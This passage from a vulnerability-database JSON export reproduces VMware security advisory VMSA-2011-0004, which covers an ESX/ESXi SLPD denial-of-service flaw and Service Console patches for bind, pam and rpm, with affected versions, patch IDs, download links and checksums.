Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2010-3609", "CVE-2010-2059", "CVE-2010-3316", "CVE-2010-3614", "CVE-2010-3613", "CVE-2010-3762", "CVE-2010-3435", "CVE-2010-3853"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2011-0004\r\nSynopsis: VMware ESX/ESXi SLPD denial of service vulnerability\r\n and ESX third party updates for Service Console\r\n packages bind, pam, and rpm.\r\nIssue date: 2011-03-07\r\nUpdated on: 2011-03-07 (initial release of advisory)\r\nCVE numbers: CVE-2010-3613 CVE-2010-3614 CVE-2010-3762\r\n CVE-2010-3316 CVE-2010-3435 CVE-2010-3853\r\n CVE-2010-2059 CVE-2010-3609\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n Service Location Protocol daemon (SLPD) denial of service issue and\r\n ESX 4.0 Service Console OS (COS) updates for bind, pam, and rpm.\r\n\r\n2. Relevant releases\r\n\r\n VMware ESXi 4.1 without patch ESXi410-201101201-SG.\r\n\r\n VMware ESXi 4.0 without patch ESXi400-201103401-SG.\r\n\r\n VMware ESX 4.1 without patch ESX410-201101201-SG.\r\n\r\n VMware ESX 4.0 without patches ESX400-201103401-SG,\r\n ESX400-201103404-SG, ESX400-201103406-SG, ESX400-201103407-SG.\r\n\r\n3. Problem Description\r\n\r\n a. Service Location Protocol daemon DoS\r\n\r\n This patch fixes a denial-of-service vulnerability in\r\n the Service Location Protocol daemon (SLPD). Exploitation of this\r\n vulnerability could cause SLPD to consume significant CPU\r\n resources.\r\n\r\n VMware would like to thank Nicolas Gregoire and US CERT for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\r\n has assigned the name CVE-2010-3609 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n vCenter any Windows not affected\r\n\r\n hosted * any any not affected\r\n\r\n ESXi 4.1 ESXi ESXi410-201101201-SG\r\n ESXi 4.0 ESXi ESXi400-201103401-SG\r\n ESXi 3.5 ESXi not applicable\r\n\r\n ESX 4.1 ESX ESX410-201101201-SG\r\n ESX 4.0 ESX ESX400-201103401-SG\r\n ESX 3.5 ESX not applicable\r\n ESX 3.0.3 ESX not applicable\r\n\r\n * hosted products are VMware Workstation, Player, Fusion.\r\n\r\n b. Service Console update for bind\r\n\r\n This patch updates the bind-libs and bind-utils RPMs to version\r\n 9.3.6-4.P1.el5_5.3, which resolves multiple security issues.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the names CVE-2010-3613, CVE-2010-3614, and\r\n CVE-2010-3762 to these issues.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available. \r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n vCenter any Windows not affected\r\n\r\n hosted * any any not affected\r\n\r\n ESXi any ESXi not applicable\r\n\r\n ESX 4.1 ESX affected, patch pending\r\n ESX 4.0 ESX ESX400-201103407-SG\r\n ESX 3.5 ESX not applicable\r\n ESX 3.0.3 ESX not applicable\r\n\r\n * hosted products are VMware Workstation, Player, Fusion.\r\n\r\n c. Service Console update for pam\r\n\r\n This patch updates the pam RPM to pam_0.99.6.2-3.27.5437.vmw,\r\n which resolves multiple security issues with PAM modules.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the names CVE-2010-3316, CVE-2010-3435, and\r\n CVE-2010-3853 to these issues.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n vCenter any Windows not affected\r\n\r\n hosted * any any not affected\r\n \r\n ESXi any ESXi not applicable\r\n\r\n ESX 4.1 ESX affected, patch pending\r\n ESX 4.0 ESX ESX400-201103404-SG\r\n ESX 3.5 ESX not applicable\r\n ESX 3.0.3 ESX not applicable\r\n\r\n * hosted products are VMware Workstation, Player, Fusion.\r\n\r\n d. Service Console update for rpm, rpm-libs, rpm-python, and popt\r\n\r\n This patch updates rpm, rpm-libs, and rpm-python RPMs to\r\n 4.4.2.3-20.el5_5.1, and popt to version 1.10.2.3-20.el5_5.1,\r\n which resolves a security issue.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2010-2059 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n vCenter any Windows not affected\r\n\r\n hosted * any any not affected\r\n\r\n ESXi any ESXi not applicable\r\n\r\n ESX 4.1 ESX affected, patch pending\r\n ESX 4.0 ESX ESX400-201103406-SG\r\n ESX 3.5 ESX not applicable\r\n ESX 3.0.3 ESX not applicable\r\n \r\n * hosted products are VMware Workstation, Player, Fusion.\r\n\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and version\r\n and verify the checksum of your downloaded file.\r\n\r\n ESXi 4.1 Installable Update 1\r\n -----------------------------\r\n \r\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_\r\n0\r\n Release Notes:\r\n \r\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.ht\r\nml\r\n http://kb.vmware.com/kb/1027919\r\n\r\n File type: .iso\r\n MD5SUM: d68d6c2e040a87cd04cd18c04c22c998\r\n SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64\r\n\r\n ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1)\r\n File type: .zip\r\n MD5SUM: 2f1e009c046b20042fae3b7ca42a840f\r\n SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1\r\n\r\n ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0)\r\n File type: .zip\r\n MD5SUM: 67b924618d196dafaf268a7691bd1a0f\r\n SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516 \r\n\r\n ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5)\r\n File type: .zip\r\n MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4\r\n SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488 \r\n\r\n VMware Tools CD image for Linux Guest OSes\r\n File type: .iso\r\n MD5SUM: dad66fa8ece1dd121c302f45444daa70\r\n SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af \r\n\r\n VMware vSphere Client\r\n File type: .exe\r\n MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e\r\n SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\r\n\r\n ESXi Installable Update 1 contains the following security bulletins:\r\n ESXi410-201101201-SG.\r\n\r\n ESX 4.1 Update 1\r\n ----------------\r\n \r\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_\r\n0\r\n Release Notes:\r\n \r\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.htm\r\nl\r\n http://kb.vmware.com/kb/1029353\r\n\r\n ESX 4.1 Update 1 (DVD ISO)\r\n File type: .iso\r\n md5sum: b9a275b419a20c7bedf31c0bf64f504e\r\n sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11 \r\n\r\n ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1)\r\n File type: .zip\r\n md5sum: 2d81a87e994aa2b329036f11d90b4c14\r\n sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798 \r\n\r\n Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1\r\n File type: .zip\r\n md5sum: 75f8cebfd55d8a81deb57c27def963c2\r\n sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2 \r\n\r\n ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0)\r\n File type: .zip\r\n md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2\r\n sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922 \r\n\r\n VMware Tools CD image for Linux Guest OSes\r\n File type: .iso\r\n md5sum: dad66fa8ece1dd121c302f45444daa70\r\n sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af \r\n\r\n VMware vSphere Client\r\n File type: .exe\r\n md5sum: cb6aa91ada1289575355d79e8c2a9f8e\r\n sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\r\n\r\n ESX410-Update01 contains the following security bulletins:\r\n ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL,\r\n Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904\r\n ESX410-201101226-SG (glibc) | http://kb.vmware.com/kb/1031330\r\n\r\n ESX410-Update01 also contains the following non-security bulletins\r\n ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG,\r\n ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG,\r\n ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG,\r\n ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG,\r\n ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG,\r\n ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG.\r\n\r\n To install an individual bulletin use esxupdate with the -b option.\r\n\r\n ESXi 4.0\r\n --------\r\n ESXi400-201103001\r\n \r\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-274-20110303-677\r\n367/ESXi400-201103001.zip\r\n md5sum: a68ef31414573460cdadef4d81fb95d0\r\n sha1sum: 7155e60962b21b5c295a2e9412ac4a445382db31\r\n http://kb.vmware.com/kb/1032823\r\n\r\n ESXi400-201103001 containes the following security bulletins:\r\n ESXi400-201103401-SG (openssl) | http://kb.vmware.com/kb/1032820\r\n ESXi400-201103402-SG | http://kb.vmware.com/kb/1032821\r\n \r\n ESX 4.0\r\n -------\r\n ESX400-201103001\r\n \r\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-273-20110303-574\r\n144/ESX400-201103001.zip\r\n md5sum: 5b9a0cfe6c0ff1467c09c8d115910ff8\r\n sha1sum: 8bfb5df8066a01704eaa24e4d8a34f371816904b\r\n http://kb.vmware.com/kb/1032822\r\n\r\n ESX400-201103001 containes the following security bulletins:\r\n ESX400-201103401-SG (SLPD, openssl, COS kernel) \r\n | http://kb.vmware.com/kb/1032814\r\n ESX400-201103403-SG (JRE, Tomcat) | http://kb.vmware.com/kb/1032815\r\n ESX400-201103404-SG (pam) | http://kb.vmware.com/kb/1032816\r\n ESX400-201103405-SG (bzip2) | http://kb.vmware.com/kb/1032817\r\n ESX400-201103406-SG (popt/rpm) | http://kb.vmware.com/kb/1032818\r\n ESX400-201103407-SG (bind) | http://kb.vmware.com/kb/1032819\r\n5. References\r\n\r\n CVE numbers\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3613\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3614\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3762\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3316\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3435\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3853\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3609\r\n\r\n- ------------------------------------------------------------------------\r\n6. Change log\r\n\r\n2011-03-07 VMSA-2011-0004\r\nInitial security advisory in conjunction with the release of VMware\r\nESX/ESXi 4.0 patches on 2011-03-07\r\n\r\n- -----------------------------------------------------------------------\r\n7. Contact\r\n\r\nE-mail list for product security notifications and announcements:\r\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\nThis Security Advisory is posted to the following lists:\r\n\r\n * security-announce at lists.vmware.com\r\n * bugtraq at securityfocus.com\r\n * full-disclosure at lists.grok.org.uk\r\n\r\nE-mail: security at vmware.com\r\nPGP key at: http://kb.vmware.com/kb/1055\r\n\r\nVMware Security Advisories\r\nhttp://www.vmware.com/security/advisories\r\n\r\nVMware security response policy\r\nhttp://www.vmware.com/support/policies/security_response.html\r\n\r\nGeneral support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos.html\r\n\r\nVMware Infrastructure support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos_vi.html\r\n\r\nCopyright 2011 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 9.8.3 (Build 4028)\r\nCharset: utf-8\r\n\r\nwj8DBQFNdceBS2KysvBH1xkRAs3MAJ0ezxEepDLaIgTNPd0v4QBrdw6ssQCfRgPw\r\nXlxhmCY1Md8s4gnoyjDGvnE=\r\n=kJHZ\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-03-10T00:00:00", "published": "2011-03-10T00:00:00", "id": "SECURITYVULNS:DOC:25898", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25898", "title": "VMSA-2011-0004 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:42", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3609", "CVE-2010-2059", "CVE-2010-3316", "CVE-2010-3614", "CVE-2010-3613", "CVE-2010-3762", "CVE-2010-3435", "CVE-2010-3853"], "description": "a. Service Location Protocol daemon DoS \nThis patch fixes a denial-of-service vulnerability in the Service Location Protocol daemon (SLPD). Exploitation of this vulnerability could cause SLPD to consume significant CPU resources. \nVMware would like to thank Nicolas Gregoire and US CERT for reporting this issue to us. \nThe Common Vulnerabilities and Exposures project ([cve.mitre.org](<http://www.cve.mitre.org/>)) has assigned the names CVE-2010-3609 to this issue. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 4, "modified": "2012-01-30T00:00:00", "published": "2011-03-07T00:00:00", "id": "VMSA-2011-0004", "href": "https://www.vmware.com/security/advisories/VMSA-2011-0004.html", "title": "VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.", "type": "vmware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
